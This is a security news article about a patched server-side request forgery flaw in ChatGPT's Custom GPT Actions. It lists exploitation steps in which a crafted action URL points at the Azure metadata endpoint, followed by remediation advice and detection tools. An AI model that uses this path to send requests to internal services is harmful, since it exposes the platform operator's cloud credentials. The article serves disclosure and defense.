ChatGPT Hacked Using Custom GPTs Exploiting SSRF Vulnerability to Expose Secrets

By Published On: November 12, 2025

ChatGPT Hacked Through Custom GPTs: An SSRF Exposes Cloud Secrets

The power and versatility of AI models like ChatGPT are undeniable, yet their rapid evolution introduces new attack surfaces. A startling discovery by Open Security recently unveiled a critical Server-Side Request Forgery (SSRF) vulnerability within OpenAI’s ChatGPT platform, specifically leveraging the Custom GPT “Actions” feature. This flaw allowed attackers to manipulate the AI into accessing internal cloud infrastructure, potentially compromising sensitive Azure credentials and other secrets.

Understanding the Vulnerability: SSRF in Custom GPT Actions

The core of this vulnerability lies in the way Custom GPTs handle user-defined URLs through their “Actions” functionality. Custom GPTs allow users to extend their capabilities by integrating with external APIs. To do this, developers specify API endpoints which the GPT can then invoke.

The discovered SSRF vulnerability meant that a malicious actor could craft a URL parameter within an API call. Rather than calling the intended external API, the crafted URL could direct the Custom GPT to make requests to internal network resources. In this specific case reported by Cyber Security News, the vulnerability enabled the GPT to query the cloud metadata service of the underlying Azure infrastructure.

Cloud metadata services often provide valuable information about the virtual machine instance it’s running on, including temporary credentials, instance profiles, and other configuration data. Access to this information can be a significant stepping stone for an attacker to escalate privileges or gain access to other cloud resources.

The Exploitation Path: From Custom GPT to Azure Credentials

The attack scenario unfolded as follows:

  • An attacker would create a Custom GPT designed to interact with a seemingly benign external service.
  • Within the “Actions” configuration for this Custom GPT, the attacker would define an API call where a URL parameter could be controlled or influenced.
  • Instead of providing a legitimate external URL, the attacker would inject an internal IP address or hostname, targeting the Azure cloud metadata endpoint (e.g., http://169.254.169.254/metadata/instance?api-version=2021-08-01).
  • When a user interacted with this malicious Custom GPT, prompting it to perform an action that triggered the crafted API call, the Custom GPT’s backend infrastructure would unwittingly make a request to the internal metadata service.
  • The response from the metadata service, containing potentially sensitive Azure credentials or other instance data, would then be processed by the GPT. In some scenarios, this information could be exfiltrated directly or indirectly by the attacker.

This incident underscores the inherent risks when AI models are granted network access and the input validation is insufficient. The ability to trick an AI into performing server-side requests to arbitrary locations within the internal network is a classic SSRF attack, now adapted for the AI age.

Remediation Actions and Best Practices

Addressing SSRF vulnerabilities, particularly in complex AI ecosystems, requires a multi-layered approach.

  • Input Validation and Sanitization: Rigorous validation of all user-supplied URLs and parameters is paramount. Whitelisting allowed domains and protocols is significantly more secure than blacklisting.
  • Principle of Least Privilege: The underlying infrastructure running AI models should operate with the absolute minimum necessary network access and permissions. Restrict outbound requests from the AI environment to only known and approved endpoints.
  • Network Segmentation: Implement strict network segmentation to isolate AI environments from critical internal infrastructure and cloud metadata services. This limits the blast radius of a successful SSRF exploit.
  • Disable Unnecessary Metadata Access: If possible, restrict or disable access to cloud metadata services entirely from application instances that do not strictly require it.
  • Web Application Firewalls (WAFs): Deploy WAFs that are configured to detect and block suspicious outbound requests, including those targeting internal IP ranges or known metadata endpoints.
  • API Gateway Protections: Utilize API gateways to centralize and enforce security policies, including request re-writing, URL validation, and access control, before requests reach the core AI service.
  • Regular Security Audits: Conduct regular security assessments, penetration testing, and code reviews, specifically looking for URL parsing vulnerabilities and potential SSRF vectors in AI integrations.

Tools for Detection and Mitigation

Security professionals can leverage various tools to detect and mitigate SSRF vulnerabilities. While direct tools for AI-specific SSRF are still evolving, general web application security tools remain highly relevant.

Tool Name Purpose Link
Burp Suite Professional Comprehensive web vulnerability scanner and proxy for manual testing and automated crawling to identify SSRF. https://portswigger.net/burp
OWASP ZAP Free and open-source web application security scanner for automated and manual vulnerability detection, including SSRF patterns. https://www.zaproxy.org/
Nuclei Fast and customizable vulnerability scanner based on simple YAML templates, useful for identifying known SSRF patterns. https://nuclei.projectdiscovery.io/
Cloud Security Posture Management (CSPM) Tools Monitor cloud configurations for misconfigurations that could enable SSRF or privilege escalation (e.g., overly permissive network access rules). (Varies by vendor: Palo Alto Prisma Cloud, Wiz, Orca Security)

Key Takeaways

The discovery of an SSRF vulnerability within ChatGPT’s Custom GPTs serves as a stark reminder: as AI systems become more integrated and powerful, they also become new targets for known attack techniques. The fundamental principles of secure software development, such as robust input validation, the principle of least privilege, and network segmentation, are as critical for AI applications as they are for traditional web applications.

This incident, while patched, highlights the ongoing need for vigilance and proactive security measures in the rapidly expanding landscape of artificial intelligence. Developers and security teams must collaborate closely to ensure that the innovations of AI do not inadvertently open doors to novel or recycled security threats.

Share this article

Leave A Comment